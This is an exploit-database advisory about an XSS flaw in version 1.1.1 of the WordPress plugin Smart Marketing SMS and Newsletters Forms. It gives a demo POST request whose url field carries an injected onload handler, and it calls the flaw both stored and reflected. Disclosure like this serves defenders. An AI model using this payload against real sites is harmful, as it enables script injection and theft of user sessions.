WordPress Smart Marketing SMS And Newsletters Forms 1.1.1 XSS Vulnerability

ID 1337DAY-ID-29133
Type zdt
Reporter Ricardo Sanchez
Modified 2017-12-06T00:00:00


WordPress Smart Marketing SMS and Newsletters Forms plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

                                            Vulnerable Smart Marketing SMS and Newsletters Forms 1.1.1

Smart Marketing SMS and Newsletters Forms is prone to a stored cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request POST:

Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

url="" onload="alert('XSS')">

#  0day.today [2018-03-12]  #